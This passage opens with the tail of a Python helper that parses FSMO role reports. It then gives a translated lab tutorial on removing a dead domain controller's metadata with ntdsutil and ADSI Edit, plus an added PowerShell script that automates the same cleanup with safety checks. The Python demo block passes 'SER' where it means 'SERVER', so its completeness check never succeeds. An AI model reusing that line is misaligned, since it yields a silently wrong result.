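        role = _ROLE_RE.match(line)
        if role:
            holders[role.group("role")] = _dc_from_ntds_dn(role.group("dn"))
    missing = [r for r in FSMO_ROLES if r not in holders]
    if missing:
        raise ValueError(f"report lacks roles: {missing}")
    if announced is not None and announced != len(holders):
        raise ValueError(f"header announces {announced} roles, found {len(holders)}")
    return holders


def roles_held_by(holders: Dict[str, str], dc: str) -> List[str]:
    """Roles whose holder is `dc` (case-insensitive), in ntdsutil order."""
    wanted = dc.upper()
    return [r for r in FSMO_ROLES if holders[r].upper() == wanted]


def seizure_complete(holders: Dict[str, str], surviving_dc: str) -> bool:
    """True once every FSMO role points at the surviving DC (so none at the dead one)."""
    return roles_held_by(holders, surviving_dc) == list(FSMO_ROLES)


if __name__ == "__main__":
    for label, report in (("after schema seize", AFTER_SCHEMA_SEIZE),
                          ("after all seizures", AFTER_ALL_SEIZURES)):
        holders = parse_role_report(report)
        print(f"{label}: still on SERVER = {roles_held_by(holders, 'SERVER')}, "
              f"complete = {seizure_complete(holders, 'SER')}")
```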


reflink: http://roseandgun.wordpress.com/2008/04/09/thi%E1%BA%BFt-l%E1%BA%ADp-hai-server-ch%E1%BA%A1y-song-song-ph%E1%BA%A7n-iii-master-operation/

[Net] Thiết lập nhiều server chạy song song - Phần 4: Remove Server đã chết

PHẦN 4: Remove Server Đã Chết

Introduction:
Before doing this lab, here is a short recap of the earlier parts so the steps below make sense.
Suppose we have a domain with 2 DCs: one master DC and one additional DC (see Part 2). The master DC (server 1) died and we turned the additional DC (server 2) into the master to replace it (see Part 3). One problem is still left for us to solve: the remains of server 1 (the dead one) are still registered in our domain, and the surviving DC keeps trying to replicate with a partner that no longer exists, which produces errors and delays. So the new requirement is to wipe every trace of the dead server so the system runs at full speed. In other words, we have to clean up its corpse.

Requirements: you have completed the steps in Part 1 and Part 3


-------------------------------------------------------------------------------
This lab consists of the following steps:

Step 1: assume server 1 has died for good
Step 2: on server 2, carry out Part 3; then open CMD and enter the commands below to remove the dead domain controller's metadata.


-------------------------------------------------------------------------------
When doing this lab I used machines 1 and 2 at the school, so the machines are labelled as follows:

- domain: nhatnghe.com
- pc1: server 1
- pc2: server 2


-----------------------------------------------------------------------------------
Procedure

1\ Shut down pc1 (server 1), then seize the 5 operations master roles to server 2 as in Part 3.
2\ On server 2 ----> open CMD

Type ---ntdsutil---

Next type ---metadata cleanup---

Then type ---connections---

At the server connections prompt type ---connect to server Pc02.nhatnghe.com--- (the full name of server 2; you always connect to the surviving DC, never to the dead one)

Next type ---quit---

Then type ---select operation target---

Type ---list domains---

Note the line found 1 domain(s): there is only one domain, nhatnghe, so here we pick number 0, which corresponds to our domain nhatnghe (if you have several domains they are all listed here).

So type ---select domain 0---

Next type ---list sites---

Look at the line found 1 site(s). By default there is one site, corresponding to number 0.

So type ---select site 0---

Next use the command ---list servers in site---

Look at the line found 2 server(s): pc1 (server 1, the dead one, number 0) and pc2 (server 2, still alive, number 1). The numbers are only the listing order, so check the name printed next to the number before selecting; picking the wrong one would remove the live DC.

Since we want to remove the dead server 1, type ---select server 0---

Next type ---quit---

Now type ---remove selected server--- (this removes the server 1 we selected above). A dialog box asks whether you really want to remove it; choose YES and wait about 30 seconds for server 1 to be removed.

Then type quit ----> quit ----> exit to leave CMD





Next, insert the Windows Server 2003 CD and install the Support Tools from it.

- Once the Support Tools are installed, go to Start ---> Run ---> mmc.
- Go to the File menu ----> Add/Remove Snap-in
---> choose the snap-in named ADSI Edit ---> open ADSI Edit, right-click it and choose Connect to...

At Select a well known Naming Context: choose Domain.

Then connect a second time, but this time choose Configuration.

Now in ADSI Edit navigate as shown in the screenshot: Domain [pc02.nhatnghe.com] ---> DC=nhatnghe,DC=com ----> OU=Domain Controllers. Look in the right-hand pane: if any trace of server 1 is still there (CN=Pc01...), delete it; in this case it has already been removed.

Next go down to Configuration [PC02.nhatnghe.com] ----> CN=Configuration,DC=nhatnghe,DC=com ----> CN=Sites ---> CN=Default-First-Site-Name ----> CN=Servers. In the right-hand pane, if a trace of server 1 remains (CN=Pc01 ...), delete it.







At this point you have finished removing the dead server 1.
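The whole of Part 4, the ntdsutil metadata cleanup followed by the ADSI Edit check, as one PowerShell script. This is an added example, not code from the original tutorial. It assumes the lab's names (surviving DC Pc02.nhatnghe.com, dead DC PC01, domain nhatnghe.com, one site called Default-First-Site-Name, all overridable as parameters), that it runs on the surviving DC as a member of Enterprise Admins, and that ntdsutil prints its listings in English in the `<n> - <DN>` form. It adds two checks the screenshots skip: it refuses to run while the dead DC still owns one of the five operations master roles, and it reads the domain, site and server index numbers back from ntdsutil's own output instead of assuming they are 0.

```powershell
# Added example (not from the tutorial): scripts the ntdsutil metadata cleanup and the
# ADSI Edit checks of Part 4. All names below are assumptions taken from the lab:
# surviving DC Pc02.nhatnghe.com, dead DC PC01, domain nhatnghe.com, site
# Default-First-Site-Name. Run on the surviving DC as an Enterprise Admin.
param(
    [string]$LiveDc   = 'Pc02.nhatnghe.com',
    [string]$DeadDc   = 'PC01',
    [string]$DomainDn = 'DC=nhatnghe,DC=com',
    [string]$SiteName = 'Default-First-Site-Name',
    [switch]$Remove     # without -Remove the script only reports; nothing is deleted
)
$ErrorActionPreference = 'Stop'
$configDn = "CN=Configuration,$DomainDn"
$siteDn   = "CN=$SiteName,CN=Sites,$configDn"
$deadSrv  = "CN=$DeadDc,CN=Servers,$siteDn"
$deadNtds = "CN=NTDS Settings,$deadSrv"

# 1. Guard: refuse to clean up a server that still owns an operations master role.
#    fSMORoleOwner on each role's object holds the NTDS Settings DN of the owner,
#    the same DNs that "knows about 5 roles" prints at the top of this page.
$roleObjects = @{
    'Schema'         = "CN=Schema,$configDn"
    'Domain naming'  = "CN=Partitions,$configDn"
    'PDC'            = $DomainDn
    'RID'            = 'CN=RID Manager$,CN=System,' + $DomainDn
    'Infrastructure' = "CN=Infrastructure,$DomainDn"
}
foreach ($role in $roleObjects.Keys) {
    $owner = [string]([ADSI]"LDAP://$LiveDc/$($roleObjects[$role])").fSMORoleOwner
    if ($owner -ieq $deadNtds) {
        throw "$DeadDc still owns the $role role; seize it to $LiveDc first (Part 3)."
    }
}

# 2. ntdsutil takes each command as one argument and runs them in order, so the
#    interactive session from the lab can be replayed. The index numbers
#    (select domain 0, select site 0, select server 0) depend on listing order,
#    so they are read back from ntdsutil's output instead of being hard-coded.
$preamble = 'metadata cleanup', 'connections', "connect to server $LiveDc", 'quit',
            'select operation target'
function Invoke-Ntdsutil([string[]]$Commands) {
    $cmds = $preamble + $Commands
    & ntdsutil @cmds 2>&1 | ForEach-Object { [string]$_ }
}
function Get-ListedIndex([string[]]$Output, [string]$Dn) {
    # listings look like "0 - CN=PC01,CN=Servers,...": return the number for $Dn
    $pattern = '^\s*(\d+)\s+-\s+' + [regex]::Escape($Dn) + '\s*$'
    foreach ($line in $Output) { if ($line -match $pattern) { return [int]$matches[1] } }
    throw "'$Dn' not listed by ntdsutil (already removed, or wrong name?)"
}
$leave = 'quit', 'quit', 'quit'   # select operation target -> metadata cleanup -> ntdsutil -> exit
$dom  = Get-ListedIndex (Invoke-Ntdsutil (@('list domains') + $leave)) $DomainDn
$site = Get-ListedIndex (Invoke-Ntdsutil (@("select domain $dom", 'list sites') + $leave)) $siteDn
$srv  = Get-ListedIndex (Invoke-Ntdsutil (@("select domain $dom", "select site $site",
                                            'list servers in site') + $leave)) $deadSrv
"ntdsutil indexes: domain=$dom site=$site server=$srv ($deadSrv)"

if ($Remove) {
    # Re-select by index, go back up one level, and remove. ntdsutil still shows its
    # "are you sure" dialog here, exactly as in the lab; answer Yes.
    Invoke-Ntdsutil @("select domain $dom", "select site $site", "select server $srv", 'quit',
                      'remove selected server', 'quit', 'quit')
}

# 3. The ADSI Edit half of the lab: check (and with -Remove, delete) the two objects the
#    tutorial inspects by hand. DeleteTree also removes the NTDS Settings child object.
$leftovers = "CN=$DeadDc,OU=Domain Controllers,$DomainDn", $deadSrv
foreach ($dn in $leftovers) {
    $path = "LDAP://$LiveDc/$dn"
    if (-not [ADSI]::Exists($path)) { "clean     $dn"; continue }
    if ($Remove) { ([ADSI]$path).DeleteTree(); "deleted   $dn" }
    else         { "LEFTOVER  $dn   (re-run with -Remove)" }
}
```

Run it once without -Remove to see the indexes and any leftovers, and only then with -Remove. Metadata cleanup is irreversible: a DC whose metadata has been removed cannot simply be powered back on and rejoin, so use this only for a server that is really gone, as in step 1 of the lab.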




Part 5 to follow

reflink: http://www.nhatnghe.com/forum/showthread.php?1268-Thi%E1%BA%BFt-l%E1%BA%ADp-nhi%E1%BB_u-server-ch%E1%BA%A1y-song-song-Ph%E1%BA%A7n-4-Remove-Server-%C4%91%C3%A3-ch%E1%BA%BFt